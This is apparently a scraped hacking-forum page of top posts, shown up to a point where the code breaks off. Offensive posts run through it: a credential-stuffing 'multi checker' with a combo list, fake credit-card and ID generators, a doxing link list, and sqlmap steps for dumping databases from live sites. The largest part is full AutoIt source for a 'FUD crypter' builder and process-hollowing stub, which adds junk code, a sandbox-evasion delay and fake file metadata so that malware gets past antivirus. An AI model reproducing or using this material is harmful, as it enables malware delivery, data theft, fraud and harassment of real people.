Jump to content
Report any bug Read more... ×
We're hiring! We are accepting applications for Developers, Teachers, Redactors and Junior Moderators. Read more... ×

Create an account on our board

or login and enjoy all the possibilities

Existing user? Sign In

Sign In

Sign Up

Learn Or Teach

You can learn computer security by practicing in the Dashboard, you can also be taught by a teacher. Or You can teach community members regardless of your specialty, and earn points for each person!

Learn or Teach

The Challenges

The new Challenges page is here. Take advantage of several vulnerable web applications to help train you such as, DVWA, XVWA, Mutillidae. You can also launch an existing or custom virtual machine.

Play Now !

Collaboration Room

The first categories of the forum are rooms that you can create or join in order to participate in events with the other members of the community. You can also create your room to make a teaching request, or attend your teacher's presentation. In this room you can create a private forum, store your information, invite other people etc.

Create Room

Create your club

You can create a club with your friends, earn points in teams. Creating a club gives you access to a team space. There you will have a private forum where you can store files, share information etc. Invite your friends and play together!

Create yours now!


Several VIP packs are available, understand that the survival of this site depends on it. Of course you can buy this pack with your points won during events. Formulas: Vip Member Vip Teacher Vip student

  • For new users read this
  • Challenges
  • for new users thank you to post in introduction and answer "Accept" on the topic of the rules to have access to the integrity of the forum and receive your Exploit-Code
  • The challenges board is being developed you are likely to encounter some bugs if this is the case report to an administrator.


Popular Content

Showing content with the highest reputation since 02/07/19 in Posts

  1. 11 points
    Hello, I present to you a small tool that I am well who is called userrecon it makes it possible to easily find all the sites which contains the defined username, this script makes it possible to find a username on: -instagram -Facebook -TWITTER -YOUTUBE -BLOGGER -GLOOGLE PLUS -REDDIT -WORDPRESS -PINTEREST -GITHUB -TUMBLR -FLICKR -STEAM -VIMEO - ETC ... Download : [Hidden Content]
  2. 6 points
    Here is a cracked version of Black leecher by ky0ox (from IH) (if you don't know what is it, it's like slayer leecher but there are steams keys and others) DL :[Hidden Content] Enjoy it
  3. 5 points
    Hello I put here the various sites that allow to locate an IP. As well as the scripts that has this function Website : - [Hidden Content] - geobytes.com/iplocator/ - [Hidden Content] - [Hidden Content] - [Hidden Content] Scripts : -Trity
  4. 4 points
    Here is a Multi checker with him you can use your Combo on netflix, Zenmate, Pornhub and many others (without configs) LINKS: Mine (i put a 1.5million combo (not private)): [Hidden Content] Some others that i find: [Hidden Content] [Hidden Content] If you want Proxies free go on this website: Proxy List Leave a like
  5. 4 points
    Hi, I'm gonna share you some website that help you to create identity for CNI verifaction or other.. Fake email (not famous so you can use on famous website): Temporary Disposable Email - 10 minute mail Free call with browser (work only with Chrome): PopTox CC generator with Ckecker/BIN : Discard - Credit Card Generator and Checker with BIN CNI generator : CNI here we are my first real post on this forum, i hope its gonna be useful... Leave a like
  6. 3 points
    The method of SQL injection with sqlmap is the most used because sqlmap (or Havij) are easy to use simply (and the manually way is really long) This tutorial is not for High level of SQL injection it's mostly to understand . What is a SQL injection ? SQL is the language used to manage and create the database of the website so a sql injection is a injection of code in order to enter into the database and take the information a the admin account (or just take the email of users) in this topic I'm gonna enter into details so if you want to learn more : [Hidden Content] How to find vulnerable site ? So the vulnerability can be find in the id argument of the url under this form : .php?id= you can use Dorks or just write .php?id= in the google search engine and scroll a lot's to automate this task you can use SQLI hunter (with dorks) : [Hidden Content] if when you add ' at the end of the url there is an error where it's writing:(or something similar) SQL/DB Error -- [You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' order by image_order limit 1' at line 1] SQL/DB Error -- [You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1] How to exploit the vulnerability ? Me i will use Pentest-box (with sqlmap include) : [Hidden Content] so once you find the web-site (or training web-site), launch a terminal and enter : sudo sqlmap -u url.fr/index.php?id=3654 --batch it will test the connection of the target and test some sql injection Then write : sudo sqlmap -u url.fr/index.php?id=3654 --dbs to show the database present to select one DB and show the tables: sudo sqlmap -u url.fr/index.php?id=3654 -D NAME_of_DB --tables and to select one tables and show the columns write : sudo sqlmap -u url.fr/index.php?id=3654 -D NAME_of_DB -T NAME_of_TABLES --columns so the next stage is to show what's into the columns (user or mail etc...) to do that we are gonna dump the DB, and to do that write: sudo sqlmap -u url.fr/index.php?id=3654 -D NAME_of_DB -T NAME_of_TABLES -C NAME_of_COLUMNS_1,NAME_of_COLUMNS_2 --dump as you can see you can select many objects by separating then with a coma. so know you have either the tables in clear either in hashes and in this case you have to decrypt the data (and that's not the subject of the topic ) and with SQLI hunter and Havij you can find the admin panel automatically , manually try a lot's a url (but the SQLI hunter and Havij way is more optimize) then connect you and do whatever you want to do. Leave a like HERE some vulnerable website : [Hidden Content] [Hidden Content]
  7. 3 points
    Hello, Whonix is an operating system focused on anonymity, privacy and security. It's based on the Tor anonymity network, Debian GNU/Linux and security by isolation. DNS leaks are impossible, and not even malware with root privileges can find out the user's real IP. Whonix consists of two parts: One solely runs Tor and acts as a gateway, which we call Whonix-Gateway. The other, which we call Whonix-Workstation, is on a completely isolated network. Only connections through Tor are possible. Whonix is produced independently of, and carries no guarantee from, The Tor Project. Download link : [Hidden Content]
  8. 3 points
    In this topic you will find all the useful links to carry out your dox If you see another website to place here, juste MP me or add in comment ! 1: Username (Alias) [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] 2: Archives [Hidden Content] [Hidden Content] [Hidden Content] 3: Social Networks [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] 4: Phone Numbers [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] 5: IP Addresses [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] 6: Skype Resolvers [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] 7: Database Search [Hidden Content] 8: WHOIS/Website [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] 9: Images [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] 10: IP2Skype [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content]ip2skype.php [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] 11: Email2Skype [Hidden Content]email.php [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] 12: Skype2Lan [Hidden Content] 13: Skype2Email [Hidden Content] [Hidden Content] 14: MAC Address Lookup [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] 15: Lat/Long [Hidden Content] [Hidden Content] [Hidden Content] 16: EXIF Data [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] 17: IP Logger [Hidden Content] [Hidden Content] 18: Other [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content]uk/ [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] 19 : Best [Hidden Content] ?️
  9. 3 points
    What is a CSRF vulnerability ? CSRF is an abbreviation which means Cross-Site Request Forgery, it is also called Sea-Surfing but also often XSRF. This is a web authentication vulnerability. This technique benefits from the trust of Web applications to its customers. The goal is to force the victim's browser to send an HTTP request without the knowledge of this user who is logged into his account (the session must be active). It will exploit this authentication and will allow to execute actions in a completely transparent way. How to exploit ? [Hidden Content] Leave a like
  10. 3 points
    The best way to make an FUD crypter is to create your own crypter Here you can find the template, dont use it before you modify it! The builder: #include <ButtonConstants.au3> #include <ComboConstants.au3> #include <EditConstants.au3> #include <GUIConstantsEx.au3> #include <StaticConstants.au3> #include <WindowsConstants.au3> #include "includes/Junkcode.au3" #include <crypt.au3> #Region ### START Koda GUI section ### Form= $Form1 = GUICreate("CarrotCrypter BETA V.0.1", 642, 506, 192, 124, BitXOR($GUI_SS_DEFAULT_GUI, $WS_MINIMIZEBOX)) GUISetBkColor(0x4c4c4c) $Pic1 = GUICtrlCreatePic("images/bg.bmp", 0, 0, 641, 97) $Group1 = GUICtrlCreateGroup("File to encrypt", 360, 136, 273, 185) DllCall("UxTheme.dll", "int", "SetWindowTheme", "hwnd", GUICtrlGetHandle($Group1), "wstr", 0, "wstr", 0) $Input1 = GUICtrlCreateInput("File_Input", 368, 176, 193, 21) $Input2 = GUICtrlCreateInput("File_Output", 368, 224, 193, 21) $Button3 = GUICtrlCreateButton("Chose File", 560, 174, 65, 25) $Button4 = GUICtrlCreateButton("Create File", 560, 222, 65, 25) $Label1 = GUICtrlCreateLabel("Chose a name for the encrypted file", 368, 205, 250, 17) $Label2 = GUICtrlCreateLabel("Chose a File to encrypt", 368, 155, 250, 17) $Input3 = GUICtrlCreateInput("", 368, 288, 257, 21) $Label3 = GUICtrlCreateLabel("Chose a passphrase to encrypt your file", 368, 268, 250, 17) GUICtrlCreateGroup("", -99, -99, 1, 1) $Button1 = GUICtrlCreateButton("License", 480, 104, 113, 33) $Button2 = GUICtrlCreateButton("?", 600, 104, 33, 33) $Group2 = GUICtrlCreateGroup("Encryption", 360, 328, 273, 169) DllCall("UxTheme.dll", "int", "SetWindowTheme", "hwnd", GUICtrlGetHandle($Group2), "wstr", 0, "wstr", 0) $Checkbox1 = GUICtrlCreateCheckbox("x64 (Can solve compability problems)", 376, 352, 241, 17) DllCall("UxTheme.dll", "int", "SetWindowTheme", "hwnd", GUICtrlGetHandle($Checkbox1), "wstr", 0, "wstr", 0) $Checkbox2 = GUICtrlCreateCheckbox("Manual compiling", 376, 384, 241, 17) DllCall("UxTheme.dll", "int", "SetWindowTheme", "hwnd", GUICtrlGetHandle($Checkbox2), "wstr", 0, "wstr", 0) $Button5 = GUICtrlCreateButton("ENCRYPT MY FILE", 376, 416, 249, 73) GUICtrlCreateGroup("", -99, -99, 1, 1) $Group3 = GUICtrlCreateGroup("USG", 8, 104, 337, 393) DllCall("UxTheme.dll", "int", "SetWindowTheme", "hwnd", GUICtrlGetHandle($Group3), "wstr", 0, "wstr", 0) $Group4 = GUICtrlCreateGroup("Custom Stub", 16, 128, 321, 265) DllCall("UxTheme.dll", "int", "SetWindowTheme", "hwnd", GUICtrlGetHandle($Group4), "wstr", 0, "wstr", 0) $Checkbox3 = GUICtrlCreateRadio("Create a custom stub (high security)", 32, 152, 289, 33) DllCall("UxTheme.dll", "int", "SetWindowTheme", "hwnd", GUICtrlGetHandle($Checkbox3), "wstr", 0, "wstr", 0) $Combo1 = GUICtrlCreateCombo("AES 256", 152, 184, 145, 25, BitOR($CBS_DROPDOWN,$CBS_AUTOHSCROLL)) GUICtrlSetData(-1, "3DES|DES|RC2") $Combo2 = GUICtrlCreateCombo("0% junk code (speed)", 152, 224, 145, 25, BitOR($CBS_DROPDOWN,$CBS_AUTOHSCROLL)) GUICtrlSetData(-1, "25% junk code (speed)|50% junk code (medium)|75% junk code (security)") $Label5 = GUICtrlCreateLabel("Encryption mode", 32, 184, 100, 17) $Label6 = GUICtrlCreateLabel("Junk code generator", 32, 224, 100, 17) $Group6 = GUICtrlCreateGroup("Icon changer", 24, 264, 305, 121) DllCall("UxTheme.dll", "int", "SetWindowTheme", "hwnd", GUICtrlGetHandle($Group6), "wstr", 0, "wstr", 0) $Input4 = GUICtrlCreateInput(".ico", 32, 328, 201, 21) $Button7 = GUICtrlCreateButton("Chose Icon", 240, 328, 81, 25) $Label7 = GUICtrlCreateLabel("Here you can chose a new Icon for your file. Chosing a new Icon increases the security.", 32, 290, 284, 41) $Button8 = GUICtrlCreateButton("Chose a precreated Icon", 32, 352, 289, 25) GUICtrlCreateGroup("", -99, -99, 1, 1) GUICtrlCreateGroup("", -99, -99, 1, 1) $Group5 = GUICtrlCreateGroup("More oprions", 16, 400, 321, 89) DllCall("UxTheme.dll", "int", "SetWindowTheme", "hwnd", GUICtrlGetHandle($Group5), "wstr", 0, "wstr", 0) $Label4 = GUICtrlCreateLabel("More Options: external stub, File informations and further security...", 50, 435, 200, 30) $Button6 = GUICtrlCreateButton("MORE OPTIONS", 232, 424, 97, 49) GUICtrlCreateGroup("", -99, -99, 1, 1) GUICtrlCreateGroup("", -99, -99, 1, 1) GUISetState(@SW_SHOW) #EndRegion ### END Koda GUI section ### $Informations = GUICreate("More Options", 252, 363, 192, 124, BitXOR($GUI_SS_DEFAULT_GUI, $WS_MINIMIZEBOX)) GUISetBkColor(0x4c4c4c) $Compile_Info = GUICtrlCreateGroup("File informations", 8, 0, 233, 281) DllCall("UxTheme.dll", "int", "SetWindowTheme", "hwnd", GUICtrlGetHandle($Compile_Info), "wstr", 0, "wstr", 0) $Check1 = GUICtrlCreateCheckbox("Create custom File informations", 24, 24, 201, 17) DllCall("UxTheme.dll", "int", "SetWindowTheme", "hwnd", GUICtrlGetHandle($Check1), "wstr", 0, "wstr", 0) $Company = GUICtrlCreateInput("Company", 24, 56, 201, 21) $Description = GUICtrlCreateInput("Description", 24, 88, 201, 21) $Version = GUICtrlCreateInput("Version", 24, 120, 201, 21) $CopyRight = GUICtrlCreateInput("Copyright", 24, 152, 201, 21) $ProductName = GUICtrlCreateInput("Product Name", 24, 184, 201, 21) $ProductVersion = GUICtrlCreateInput("Product Version", 24, 216, 201, 21) $OriginalName = GUICtrlCreateInput("Original Executable Name", 24, 248, 201, 21) GUICtrlCreateGroup("", -99, -99, 1, 1) $lab2 = GUICtrlCreateButton("Random File informations", 8, 296, 233, 25) $Check3 = GUICtrlCreateCheckbox("Create Delay to bypass Sandbox", 8, 328, 233, 25) DllCall("UxTheme.dll", "int", "SetWindowTheme", "hwnd", GUICtrlGetHandle($Check3), "wstr", 0, "wstr", 0) GUISetState(@SW_HIDE) ;STYLLEE GUICtrlSetState($Combo1,$GUI_DISABLE) GUICtrlSetState($Combo2,$GUI_DISABLE) GUICtrlSetState($Input4,$GUI_DISABLE) GUICtrlSetState($Button7,$GUI_DISABLE) GUICtrlSetState($Button8,$GUI_DISABLE) GUICtrlSetState($Company,$GUI_DISABLE) GUICtrlSetState($Description,$GUI_DISABLE) GUICtrlSetState($Version,$GUI_DISABLE) GUICtrlSetState($CopyRight,$GUI_DISABLE) GUICtrlSetState($ProductName,$GUI_DISABLE) GUICtrlSetState($ProductVersion,$GUI_DISABLE) GUICtrlSetState($OriginalName,$GUI_DISABLE) GUICtrlSetBkColor($Button1, 0xe6830e) GUICtrlSetColor($Button1, 0xffffff) GUICtrlSetBkColor($Button2, 0xe6830e) GUICtrlSetColor($Button2, 0xffffff) GUICtrlSetBkColor($Button3, 0xe6830e) GUICtrlSetColor($Button3, 0xffffff) GUICtrlSetBkColor($Button4, 0xe6830e) GUICtrlSetColor($Button4, 0xffffff) GUICtrlSetBkColor($Button5, 0xe6830e) GUICtrlSetColor($Button5, 0xffffff) GUICtrlSetBkColor($Button6, 0xe6830e) GUICtrlSetColor($Button6, 0xffffff) GUICtrlSetBkColor($Button7, 0xe6830e) GUICtrlSetColor($Button7, 0xffffff) GUICtrlSetBkColor($Button8, 0xe6830e) GUICtrlSetColor($Button8, 0xffffff) GUICtrlSetColor($label1, 0xffffff) GUICtrlSetColor($label2, 0xffffff) GUICtrlSetColor($label3, 0xffffff) GUICtrlSetColor($label4, 0xffffff) GUICtrlSetColor($label5, 0xffffff) GUICtrlSetColor($label6, 0xffffff) GUICtrlSetColor($label7, 0xffffff) GUICtrlSetColor($Group1, 0xffffff) GUICtrlSetColor($Group2, 0xffffff) GUICtrlSetColor($Group3, 0xffffff) GUICtrlSetColor($Group4, 0xffffff) GUICtrlSetColor($Group5, 0xffffff) GUICtrlSetColor($Group6, 0xffffff) GUICtrlSetColor($Compile_Info, 0xffffff) GUICtrlSetColor($Checkbox1, 0xffffff) GUICtrlSetColor($Checkbox2, 0xffffff) GUICtrlSetColor($Checkbox3, 0xffffff) GUICtrlSetColor($Check1, 0xffffff) GUICtrlSetColor($lab2, 0xffffff) GUICtrlSetBkColor($lab2, 0xe6830e) GUICtrlSetColor($Check3, 0xffffff) $pwd = "" Dim $aSpace[3] $digits = 15 For $i = 1 To $digits $aSpace[0] = Chr(Random(65, 90, 1)) ;A-Z $aSpace[1] = Chr(Random(97, 122, 1)) ;a-z $aSpace[2] = Chr(Random(48, 57, 1)) ;0-9 $pwd &= $aSpace[Random(0, 2, 1)] Next GUICtrlSetData($Input3, $pwd) ;ENDSTYYKLE $Includes = '#include "' & @ScriptDir & '\includes\crypt.au3"' & @CRLF $Delay = "" FileChangeDir(@ScriptDir) While 1 $nMsg = GUIGetMsg() Switch $nMsg Case $GUI_EVENT_CLOSE Exit Case $Button6 GUISetState(@SW_SHOW, $Informations) While 1 Switch GUIGetMsg() Case $GUI_EVENT_CLOSE GUISetState(@SW_HIDE, $Informations) ExitLoop Case $Check1 If GUICtrlRead($Check1) = $GUI_CHECKED Then GUICtrlSetState($Company,$GUI_ENABLE) GUICtrlSetState($Description,$GUI_ENABLE) GUICtrlSetState($Version,$GUI_ENABLE) GUICtrlSetState($CopyRight,$GUI_ENABLE) GUICtrlSetState($ProductName,$GUI_ENABLE) GUICtrlSetState($ProductVersion,$GUI_ENABLE) GUICtrlSetState($OriginalName,$GUI_ENABLE) Else GUICtrlSetState($Company,$GUI_DISABLE) GUICtrlSetState($Description,$GUI_DISABLE) GUICtrlSetState($Version,$GUI_DISABLE) GUICtrlSetState($CopyRight,$GUI_DISABLE) GUICtrlSetState($ProductName,$GUI_DISABLE) GUICtrlSetState($ProductVersion,$GUI_DISABLE) GUICtrlSetState($OriginalName,$GUI_DISABLE) EndIf Case $Check3 $Delay = "sleep(45000)" & @CRLF Case $lab2 $YEAH = _RandomString() $YEAH1 = _RandomString() $YEAH2 = _RandomVersion() $YEAH3 = _RandomString() $YEAH4 = _RandomString() $YEAH5 = _RandomVersion() $YEAH6 = _RandomString() GUICtrlSetData($Company, $YEAH) GUICtrlSetData($Description, $YEAH1) GUICtrlSetData($Version, $YEAH2) GUICtrlSetData($CopyRight, $YEAH3) GUICtrlSetData($ProductName, $YEAH4) GUICtrlSetData($ProductVersion, $YEAH5) GUICtrlSetData($OriginalName, $YEAH6) EndSwitch WEnd Case $Button3 $SourceFile = FileOpenDialog("C:/",@ScriptDir&'\',"Executables (*.exe*)",9) GUICtrlSetData($Input1, $SourceFile) Case $Button4 $DestinationFile = FileSaveDialog("C:/",@ScriptDir&'\',"Executables (*.exe*)",9) GUICtrlSetData($Input2, $DestinationFile) Case $Button7 $Icon = FileOpenDialog("C:/",@ScriptDir&'\',"Icons (*.ico*)",9) GUICtrlSetData($Input4, $Icon) Case $Button8 $Icon = FileOpenDialog("C:/",@ScriptDir&'\icons\',"Icons (*.ico*)",9) GUICtrlSetData($Input4, $Icon) Case $Button5 ;errors If GUICtrlRead($Input1) == "File_Input" Then msgbox(0, "Error", "Please chose a File to encrypt") Endif ;fin errors Switch GUICtrlRead($Combo1) Case "3DES" $algo = $CALG_3DES Case "DES" $algo = $CALG_DES Case "RC2" $algo = $CALG_RC2 Case "AES 256" $algo = $CALG_AES_256 EndSwitch Switch GUICtrlRead($Combo2) Case "0% junk code (speed)" $Junk = @CRLF & _JunkCreate(0) & @CRLF $Junk1 = @CRLF & _JunkCreate(0) & @CRLF $Junk2 = @CRLF & _JunkCreate(0) & @CRLF Case "25% junk code (speed)" $Junk = @CRLF & _JunkCreate(50) & @CRLF $Junk1 = @CRLF & _JunkCreate(50) & @CRLF $Junk2 = @CRLF & _JunkCreate(50) & @CRLF Case "50% junk code (medium)" $Junk = @CRLF & _JunkCreate(100) & @CRLF $Junk1 = @CRLF & _JunkCreate(100) & @CRLF $Junk2 = @CRLF & _JunkCreate(100) & @CRLF Case "75% junk code (security)" $Junk = @CRLF & _JunkCreate(150) & @CRLF $Junk1 = @CRLF & _JunkCreate(150) & @CRLF $Junk2 = @CRLF & _JunkCreate(150) & @CRLF Endswitch $sSourceRead = GUICtrlRead($Input1) $sDestinationRead = GUICtrlRead($Input2) $sPasswordRead = GUICtrlRead($Input3) $Company = GUICtrlRead($Company) $Description = GUICtrlRead($Description) $Version = GUICtrlRead($Version) $CopyRight = GUICtrlRead($CopyRight) $ProductName = GUICtrlRead($ProductName) $ProductVersion = GUICtrlRead($ProductVersion) $OriginalName = GUICtrlRead($OriginalName) $pragma = "#pragma compile(CompanyName, " & $Company & ")" & @CRLF & "#pragma compile(FileDescription, " & $Description & ")" & @CRLF & "#pragma compile(FileVersion, " & $Version & ")" & @CRLF & "#pragma compile(LegalCopyright, " & $Copyright & ")" & @CRLF & "#pragma compile(OriginalFilename, " & $OriginalName & ".exe )" & @CRLF & "#pragma compile(ProductName, " & $ProductName & ")" & @CRLF & "#pragma compile(ProductVersion, " & $ProductVersion & ")" & @CRLF $sIcon = GUICtrlRead($Input4) $BIN = _Binary($sSourceRead) FileChangeDir(@ScriptDir) ;---------------------CUSTOM STUB VARIABLES------------------------------ $r1 = _RandomStringForRandomStub() ;Generate Random Variables $nRvar = 1 Dim $rV[100] while $nRvar < 100 $rV[$nRvar] = "$" & _RandomStringForRandomStub() $nRvar = $nRvar + 1 Wend ;Create the new stub $Stub = FileOpen("includes/AZERR.au3") $Content = FileRead($Stub) FileClose($Stub) ;File changes : string modification $MainFunc = StringReplace($Content, "$bBinaryImage", $rV[1]) $MainFunc1 = StringReplace($MainFunc, "_AZERR", $r1) $MainFunc2 = StringReplace($MainFunc1, "$sCommandLine", $rV[2]) $MainFunc3 = StringReplace($MainFunc2, "$sExeModule", $rV[3]) $MainFunc4 = StringReplace($MainFunc3, "$fAutoItX64", $rV[4]) $MainFunc5 = StringReplace($MainFunc4, "$bBinary", $rV[5]) $MainFunc6 = StringReplace($MainFunc5, "$tBinary", $rV[6]) $MainFunc7 = StringReplace($MainFunc6, "$iNewPID", $rV[7]) $MainFunc8 = StringReplace($MainFunc7, "$pPointer", $rV[8]) $MainFunc9 = StringReplace($MainFunc8, "$tSTARTUPINFO", $rV[9]) $MainFunc10 = StringReplace($MainFunc9, "$tPROCESS_INFORMATION", $rV[10]) $MainFunc11 = StringReplace($MainFunc10, "$aCall", $rV[11]) $MainFunc12 = StringReplace($MainFunc11, "$hProcess", $rV[12]) $MainFunc13 = StringReplace($MainFunc12, "$hThread", $rV[13]) $MainFunc14 = StringReplace($MainFunc13, "$iRunFlag", $rV[14]) $MainFunc15 = StringReplace($MainFunc14, "$tCONTEXT", $rV[15]) $MainFunc16 = StringReplace($MainFunc15, "$CONTEXT_FULL", $rV[16]) $MainFunc17 = StringReplace($MainFunc16, "$pPEB", $rV[17]) Func _RandomStringForRandomStub() $rString = "" Dim $aRr[2] $digits = Random(10, 15, 1) For $i = 1 To $digits $aRr[0] = Chr(Random(65, 90, 1)) $aRr[1] = Chr(Random(97, 122, 1)) $rString &= $aRr[Random(0, 1, 1)] Next Return $rString EndFunc ;----------------------------------------------------------------------------------------- $RUN = @CRLF & $r1 & '($SDER)' & @CRLF $encryptedpass = @CRLF & "$SDER = _Crypt_DecryptData($bBinary, '" & $sPasswordRead & "', " & $algo & ")" If GUICtrlRead($Check1) = $GUI_CHECKED Then FileWrite($sDestinationRead & ".au3", $pragma & $Delay & $Includes & $Junk & $MainFunc17 & @CRLF & $BIN & $Junk1 & $encryptedpass & $Junk2 & $RUN) Else FileWrite($sDestinationRead & ".au3", $Delay & $Includes & $Junk & $MainFunc17 & @CRLF & $BIN & $Junk1 & $encryptedpass & $Junk2 & $RUN) EndIf If FileExists($sDestinationRead & ".au3") = 1 Then If GUICtrlRead($Input4) == ".ico" Then If GUICtrlRead($Checkbox1) = $GUI_CHECKED Then Run("Aut2exe.exe /in " & $sDestinationRead & ".au3 /out " & $sDestinationRead & ".exe /x64") Else Run("Aut2exe.exe /in " & $sDestinationRead & ".au3 /out " & $sDestinationRead & ".exe /x86") Endif Else If GUICtrlRead($Checkbox1) = $GUI_CHECKED Then Run("Aut2exe.exe /in " & $sDestinationRead & ".au3 /out " & $sDestinationRead & ".exe /icon " & $sIcon & " /x64") Else Run("Aut2exe.exe /in " & $sDestinationRead & ".au3 /out " & $sDestinationRead & ".exe /icon " & $sIcon & " /x86") Endif EndIf sleep(200) If GUICtrlRead($Checkbox2) = $GUI_CHECKED Then FileDelete($sDestinationRead & ".exe") Else FileDelete($sDestinationRead & ".au3") Endif msgbox(0, "Encryption finished", "You can now distribute your file with security") EndIf Case $Button2 msgbox(0, "Informations - Carrotcrypter", "Help" & @CRLF & " -Contact our customer team at Carrotnet.cf" & @CRLF & "Informations" & @CRLF & " -Created by Carrotinblack" & @CRLF & " -2017 copyright Thecarrotnet ©") Case $Checkbox3 GUICtrlSetState($Combo1,$GUI_ENABLE) GUICtrlSetState($Combo2,$GUI_ENABLE) GUICtrlSetState($Input4,$GUI_ENABLE) GUICtrlSetState($Button7,$GUI_ENABLE) GUICtrlSetState($Button8,$GUI_ENABLE) EndSwitch WEnd Func _Binary($FTOB) Local $hModule = FileOpen($FTOB, 16) If @error Then Exit Global $bBinary = FileRead($hModule) FileClose($hModule) $bBinary = _Crypt_EncryptData($bBinary, $sPasswordRead, $algo) Local Const $MAX_LINESIZE = 4095 Local $iNewLine, $j Local $iChinkSize = 32 Local $sBinary For $i = 1 To BinaryLen($bBinary) Step $iChinkSize $j += 1 If 4*($j * $iChinkSize) > $MAX_LINESIZE - 129 Then $iNewLine = 1 EndIf If $iNewLine Then $iNewLine = 0 $j = 0 $sBinary = StringTrimRight($sBinary, 5) $sBinary &= @CRLF & '$bBinary &= "' & StringTrimLeft(BinaryMid($bBinary, $i, $iChinkSize), 2) & '" & _' & @CRLF ContinueLoop EndIf If $i = 1 Then $sBinary &= '$bBinary = "' & BinaryMid($bBinary, $i, $iChinkSize) & '" & _' & @CRLF Else $sBinary &= ' "' & StringTrimLeft(BinaryMid($bBinary, $i, $iChinkSize), 2) & '" & _' & @CRLF EndIf Next $sBinary = StringTrimRight($sBinary, 5) Return $sBinary Endfunc The Public Stub : Global $iNewPID Func _AZERR($bBinaryImage, $sCommandLine = "", $sExeModule = @AutoItExe) #Region 1. DETERMINE INTERPRETER TYPE Local $fAutoItX64 = @AutoItX64 #Region 2. PREDPROCESSING PASSED Local $bBinary = Binary($bBinaryImage) ; this is redundant but still... ; Make structure out of binary data that was passed Local $tBinary = DllStructCreate("byte[" & BinaryLen($bBinary) & "]") DllStructSetData($tBinary, 1, $bBinary) ; fill it ; Get pointer to it Local $pPointer = DllStructGetPtr($tBinary) #Region 3. CREATING NEW PROCESS ; STARTUPINFO structure (actually all that really matters is allocated space) Local $tSTARTUPINFO = DllStructCreate("dword cbSize;" & _ "ptr Reserved;" & _ "ptr Desktop;" & _ "ptr Title;" & _ "dword X;" & _ "dword Y;" & _ "dword XSize;" & _ "dword YSize;" & _ "dword XCountChars;" & _ "dword YCountChars;" & _ "dword FillAttribute;" & _ "dword Flags;" & _ "word ShowWindow;" & _ "word Reserved2;" & _ "ptr Reserved2;" & _ "ptr hStdInput;" & _ "ptr hStdOutput;" & _ "ptr hStdError") ; This is much important. This structure will hold very some important data. Local $tPROCESS_INFORMATION = DllStructCreate("ptr Process;" & _ "ptr Thread;" & _ "dword ProcessId;" & _ "dword ThreadId") ; Create new process Local $aCall = DllCall("kernel32.dll", "bool", "CreateProcessW", _ "wstr", $sExeModule, _ "wstr", $sCommandLine, _ "ptr", 0, _ "ptr", 0, _ "int", 0, _ "dword", 4, _ ; CREATE_SUSPENDED ; <- this is essential "ptr", 0, _ "ptr", 0, _ "ptr", DllStructGetPtr($tSTARTUPINFO), _ "ptr", DllStructGetPtr($tPROCESS_INFORMATION)) ; Check for errors or failure If @error Or Not $aCall[0] Then Return SetError(1, 0, 0) ; CreateProcess function or call to it failed ; Get new process and thread handles: Local $hProcess = DllStructGetData($tPROCESS_INFORMATION, "Process") Local $hThread = DllStructGetData($tPROCESS_INFORMATION, "Thread") ; Check for 'wrong' bit-ness. Not because it could't be implemented, but besause it would be uglyer (structures) If $fAutoItX64 And _RunBinary_IsWow64Process($hProcess) Then DllCall("kernel32.dll", "bool", "TerminateProcess", "handle", $hProcess, "dword", 0) Return SetError(2, 0, 0) EndIf #Region 4. FILL CONTEXT STRUCTURE ; CONTEXT structure is what's really important here. It's processor specific. Local $iRunFlag, $tCONTEXT If $fAutoItX64 Then If @OSArch = "X64" Then $iRunFlag = 2 $tCONTEXT = DllStructCreate("align 16; uint64 P1Home; uint64 P2Home; uint64 P3Home; uint64 P4Home; uint64 P5Home; uint64 P6Home;" & _ ; Register parameter home addresses "dword ContextFlags; dword MxCsr;" & _ ; Control flags "word SegCS; word SegDs; word SegEs; word SegFs; word SegGs; word SegSs; dword EFlags;" & _ ; Segment Registers and processor flags "uint64 Dr0; uint64 Dr1; uint64 Dr2; uint64 Dr3; uint64 Dr6; uint64 Dr7;" & _ ; Debug registers "uint64 Rax; uint64 Rcx; uint64 Rdx; uint64 Rbx; uint64 Rsp; uint64 Rbp; uint64 Rsi; uint64 Rdi; uint64 R8; uint64 R9; uint64 R10; uint64 R11; uint64 R12; uint64 R13; uint64 R14; uint64 R15;" & _ ; Integer registers "uint64 Rip;" & _ ; Program counter "uint64 Header[4]; uint64 Legacy[16]; uint64 Xmm0[2]; uint64 Xmm1[2]; uint64 Xmm2[2]; uint64 Xmm3[2]; uint64 Xmm4[2]; uint64 Xmm5[2]; uint64 Xmm6[2]; uint64 Xmm7[2]; uint64 Xmm8[2]; uint64 Xmm9[2]; uint64 Xmm10[2]; 